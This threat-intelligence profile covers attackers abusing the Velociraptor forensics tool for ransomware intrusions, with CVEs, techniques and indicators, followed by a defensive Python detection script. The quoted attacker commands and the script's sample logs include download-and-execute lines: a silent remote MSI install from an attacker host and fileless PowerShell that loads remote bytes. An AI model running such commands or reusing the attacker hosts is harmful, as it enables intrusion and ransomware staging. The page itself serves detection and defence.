Velociraptor
Velociraptor is a legitimate open-source digital forensics and incident response (DFIR) tool that threat actors have repeatedly abused as a post-compromise remote access, command-and-control, persistence, and tunneling framework. Public reporting ties its malicious use to ransomware intrusions involving Warlock, LockBit, and Babuk, and to activity attributed to Storm-2603 (also tracked as GOLD SALEM / CL-CRI-1040), with additional use noted by operators associated with The Gentlemen RaaS and in SolarWinds Web Help Desk exploitation cases. Observed capabilities when misused include remote command execution, artifact collection, endpoint control, deployment as a Windows service, use as a backdoor, and establishment of covert tunnels, including Visual Studio Code tunnel abuse and Cloudflare-based tunnel infrastructure. Multiple incidents describe attackers installing Velociraptor via MSI payloads such as v2.msi, v3.msi, and v4.msi, often fetched with msiexec from Cloudflare Workers, Supabase, or other staging infrastructure.
The reporting links Velociraptor abuse to several initial access paths and intrusion chains, including exploitation of Microsoft SharePoint ToolShell vulnerabilities (including CVE-2025-49704 and CVE-2025-49706), SolarWinds Web Help Desk vulnerabilities (including CVE-2025-26399, CVE-2025-40536, and CVE-2025-40551), SmarterMail vulnerabilities CVE-2026-23760 and CVE-2026-24423, and WSUS exploitation associated with CVE-2025-59287. In these cases, attackers used Velociraptor after initial compromise to maintain access, move toward domain compromise, stage ransomware, and support stealthy operations. The reporting specifically notes use against Windows servers and endpoints, VMware ESXi environments in ransomware operations, and victims across sectors including government, commercial enterprises, MSPs, and organizations affected through exposed internet-facing infrastructure.
Several reports emphasize abuse of the outdated Velociraptor version 0.73.4 / 0.73.4.0. Reports state that attackers deployed this version because it was susceptible to CVE-2025-6264, which enabled privilege escalation, arbitrary command execution, and endpoint takeover. In observed campaigns, Velociraptor was configured to communicate with attacker-controlled infrastructure including velo[.]qaubctgg[.]workers[.]dev, auth[.]qgtxtebl[.]workers[.]dev, update[.]githubtestbak[.]workers[.]dev, and chat[.]hcqhajfv[.]workers[.]dev. Additional related infrastructure and delivery locations mentioned in the reporting include files[.]qaubctgg[.]workers[.]dev, royal-boat-bf05[.]qgtxtebl[.]workers[.]dev, and Supabase-hosted MSI payloads. Associated detections and artifacts mentioned include Troj/Agent-BLMR, Troj/BatDl-PL, Troj/Mdrop-KDK, ServiceEXE identified as the Velociraptor binary, and configuration files containing attacker server_url values.
Across this reporting, Velociraptor is consistently described not as malware by design but as a legitimate security tool repurposed by threat actors for stealthy C2, persistence, lateral enablement, and ransomware precursor activity.
Vulnerabilities exploited
11 CVEs Mallory has correlated with this family across public research and vendor advisories.
Velociraptor is a digital forensics and incident response (DFIR) tool that we have seen threat actors abuse recently in attacks in order to set up command-and-control (C2) communications.
Threat actors have started to use the Velociraptor digital forensics and incident response (DFIR) tool in attacks that deploy LockBit and Babuk ransomware.
"CVE-2026-24423... exploits a weakness in the ConnectToHub API method to achieve unauthenticated remote code execution (RCE)."
"CVE-2026-23760 is an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by sending a specially crafted HTTP request."
Huntress reported active exploitation of SolarWinds Web Help Desk vulnerabilities (CVE-2025-26399 and CVE-2025-40551) by unidentified threat actors, deploying remote management tools and Velociraptor for command and control.
"Shortly after reconnaissance, the attacker deployed Velociraptor, an open-source DFIR platform... its ability to execute commands, collect artifacts, and remotely control endpoints makes it an effective command-and-control (C2) framework when misused."
Groups observed using it
2 distinct threat actors attributed by public researchers.
In August, CTU researchers observed GOLD SALEM abusing the legitimate open-source Velociraptor digital forensics and incident response (DFIR) tool to establish a Visual Studio Code network tunnel within the compromised environment. Some of these incidents ended in Warlock ransomware deployment.
...followed by dropping additional payloads like Velociraptor and the locker to encrypt files.
Techniques & procedures
20 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
The attacker prepared their own Elastic Cloud free trial, using legitimate Elastic infrastructure, using it as a repository for stolen data across intrusions.
Initial Access
1 technique
"CVE-2026-23760 enables authentication bypass via the password reset API... allowing anyone to reset a password by supplying just a username."
Execution
5 techniques
"the attackers use this tool—designed for incident response—to maintain persistence and 'set the stage' for their ransomware payload."
These tactics are in addition to previous post-exploit tools and techniques used by the group, which included the Velociraptor digital forensics and incident response (DFIR) tool as its primary command-and-control (C2) framework...
PSRemoting, a built-in Windows feature for remote administration, was enabled and used to execute PowerShell commands on remote systems:
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe "Enable-PSRemoting -Force -SkipNetworkProfileCheck"
We observed three related PowerShell executions through Velociraptor, all following the same fileless execution pattern: downloading remote bytes, loading them directly into memory via [Reflection.Assembly]::Load(), and executing them with .EntryPoint.Invoke().
"the Java process executed cmd.exe to silently install a remote MSI payload: msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi"
"used the SmarterMail process MailService.exe to spawn a command shell"
Persistence
2 techniques
"the attackers use this tool—designed for incident response—to maintain persistence and 'set the stage' for their ransomware payload."
Privilege Escalation
2 techniques
"the attackers use this tool—designed for incident response—to maintain persistence and 'set the stage' for their ransomware payload."
"used an outdated version of the Velociraptor, 0.73.4, which is vulnerable to a privilege escalation flaw that allows increasing permissions on the host."
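The abuse patterns quoted above (a remote MSI installed through msiexec, fileless PowerShell built on [Reflection.Assembly]::Load() and EntryPoint.Invoke(), PSRemoting enabled with -SkipNetworkProfileCheck, and the version 0.73.4 and attacker server_url artifacts in the client configuration) lend themselves to a simple hunt. The following script is an added example, not code from Mallory or from any of the vendor reports quoted on this page. It runs a handful of rules over constructed process-creation records and a constructed Velociraptor client configuration. The record layout (user|parent|image|command line), the rule names, the severities, the approved-host allowlist, and the assumption that the client configuration carries its server_urls list and version block in the YAML layout shown are all this example's own choices; the workers.dev hostnames are the ones from the page's reporting, reassembled only so that the regular expressions can match them.

```python
"""Triage helpers for the Velociraptor-abuse patterns described on this page.

Constructed example: the record layout, rule names and severities are this
example's own choices, not a vendor schema.
"""
import re
from urllib.parse import urlparse

# Staging services the page's reporting associates with MSI delivery
# (Cloudflare Workers and Supabase).
SUSPECT_STAGING_SUFFIXES = (".workers.dev", ".supabase.co")
# Client version the reporting ties to CVE-2025-6264 abuse.
VULNERABLE_VERSIONS = {"0.73.4", "0.73.4.0"}

REMOTE_MSI_RE = re.compile(r"msiexec(?:\.exe)?\s.*?/i\s+(https?://\S+)", re.I)
REFLECTIVE_LOAD_RE = re.compile(
    r"\[Reflection\.Assembly\]::Load\(.*EntryPoint\.Invoke\(", re.I)
PSREMOTING_RE = re.compile(r"Enable-PSRemoting\b.*-SkipNetworkProfileCheck", re.I)
# Assumed client.config.yaml layout: a "server_urls:" key followed by a
# "- url" list, and a "version: x.y.z" line inside the version block.
SERVER_URLS_BLOCK_RE = re.compile(r"server_urls:[ \t]*\n((?:[ \t]*-[ \t]*\S+\n?)+)")
VERSION_RE = re.compile(r"^\s*version:\s*([\d.]+)\s*$", re.M)

# Constructed process-creation records: user|parent image|image|command line.
SAMPLE_PROCESS_LOGS = [
    "SYSTEM|java.exe|cmd.exe|cmd.exe /c msiexec /q /i https://files.qaubctgg.workers.dev/v2.msi",
    "admin|explorer.exe|msiexec.exe|msiexec /i C:\\Setup\\approved-agent.msi",
    "SYSTEM|Velociraptor.exe|powershell.exe|powershell -nop -c $b=(New-Object Net.WebClient)"
    ".DownloadData('https://example.invalid/x');[Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)",
    "admin|services.exe|powershell.exe|powershell Enable-PSRemoting -Force -SkipNetworkProfileCheck",
    "admin|services.exe|Velociraptor.exe|Velociraptor.exe --config client.config.yaml client",
]

# Constructed client configuration in the YAML layout assumed above.
SAMPLE_CLIENT_CONFIG = """\
version:
  name: velociraptor
  version: 0.73.4
Client:
  server_urls:
  - https://velo.qaubctgg.workers.dev/
  - https://velociraptor.corp.example/
  ca_certificate: |
    -----BEGIN CERTIFICATE-----
    constructed placeholder
    -----END CERTIFICATE-----
"""


def host_is_suspect(url):
    """True when the URL host sits on one of the staging services above."""
    host = (urlparse(url).hostname or "").lower()
    return host.endswith(SUSPECT_STAGING_SUFFIXES)


def triage_process_line(line):
    """Return [(rule, severity), ...] for one constructed process record."""
    try:
        _user, parent, image, cmdline = line.split("|", 3)
    except ValueError:
        return [("malformed-record", "info")]
    hits = []
    m = REMOTE_MSI_RE.search(cmdline)
    if m:  # MSI fetched from a URL rather than a local package path
        hits.append(("msiexec-remote-msi", "high" if host_is_suspect(m.group(1)) else "medium"))
    if REFLECTIVE_LOAD_RE.search(cmdline):  # fileless load-and-invoke pattern
        hits.append(("powershell-reflective-load", "high"))
    if PSREMOTING_RE.search(cmdline):  # remoting enabled without the profile check
        hits.append(("psremoting-enabled", "medium"))
    if parent.lower() == "velociraptor.exe" and image.lower() in ("powershell.exe", "cmd.exe"):
        hits.append(("velociraptor-spawned-shell", "high"))
    return hits


def check_client_config(config_text, approved_hosts):
    """Flag server_urls outside the allowlist and known-vulnerable client versions."""
    findings = []
    block = SERVER_URLS_BLOCK_RE.search(config_text)
    for url in re.findall(r"https?://\S+", block.group(1)) if block else []:
        if (urlparse(url).hostname or "").lower() not in approved_hosts:
            findings.append(("unapproved-server-url", url))
    for ver in VERSION_RE.findall(config_text):
        if ver in VULNERABLE_VERSIONS:
            findings.append(("vulnerable-client-version", ver))
    return findings


if __name__ == "__main__":
    for rec in SAMPLE_PROCESS_LOGS:
        for rule, sev in triage_process_line(rec):
            print(f"[{sev}] {rule}: {rec}")
    for rule, value in check_client_config(SAMPLE_CLIENT_CONFIG, {"velociraptor.corp.example"}):
        print(f"[config] {rule}: {value}")
```

Run as a script to print the findings for the constructed data; in practice the process rules would be fed Sysmon Event ID 1 or Windows 4688 records, and the configuration check would be pointed at the client.config.yaml found beside any Velociraptor binary that the organisation did not deploy. The unapproved server_url is the decisive artifact: a sanctioned deployment only ever points at the organisation's own Velociraptor server, so any other host in that list marks the installation as foreign regardless of version.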
Stealth
4 techniques
The Velociraptor installer was disguised as "v4.msi"... In our previous report, the threat actors renamed rclone.exe to TrendSecurity.exe to appear legitimate. In this incident, the file that was renamed to TrendSecurity.exe functioned as a loader... The threat actors continue to use a renamed version of the legitimate tool rclone.exe (disguised as TrendFileSecurityCheck.exe).
"...installs Velociraptor, a legitimate digital forensics tool... to maintain access and set the stage for ransomware."
Defense Impairment
1 technique
Credential Access
2 techniques
Velociraptor: used as a covert C2 platform, including memory and LSASS dumping... KslDump: dumps Kerberos / LSASS-related material... buildx641 ... uses ... ntds.dit, and SYSTEM copies...
Discovery
1 technique
Lateral Movement
1 technique
"Storm-2603 chains this access with the software's built-in 'Volume Mount' feature to gain full system control."
Command and Control
4 techniques
Velociraptor, for command-and-control (C2). Visual Studio Code and Cloudflare Tunnel, for tunneling C2 communications. Yuze, for intranet penetration and establishing a reverse proxy connection to the attacker's C2 server across HTTP (port 80), HTTPS (port 443), and DNS (port 53).
For remote access and C2, they rely on frameworks like ZeroPulse and Velociraptor, combined with Cloudflare-based tunnels and custom VPN setups to keep stable access into compromised networks.
These methods include exploiting the Nsec driver with a new BYOVD technique as well as using the remote-access tool TightVNC and the reverse-proxy tool Yuze...
CTU researchers observed GOLD SALEM abusing the legitimate open-source Velociraptor digital forensics and incident response (DFIR) tool to establish a Visual Studio Code network tunnel within the compromised environment.
Exfiltration
1 technique
Data exfiltration is then carried out using automated tools and tuned configurations to move large volumes of data efficiently...
IOCs tracked for this family
6 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
23 sources tracked across advisories, community write-ups, and news.
A covert remote access/C2 platform used by the operators, including for memory and LSASS dumping, as part of ransomware intrusion workflows.
A legitimate DFIR platform repurposed by the threat actors as their primary command-and-control framework for stealthy persistence and remote operations.
Legitimate DFIR/endpoint visibility tool repurposed by threat actors for command-and-control, persistence, and reconnaissance in intrusions.
Legitimate DFIR/post-exploitation tool abused by attackers for persistence and operational staging in support of ransomware deployment.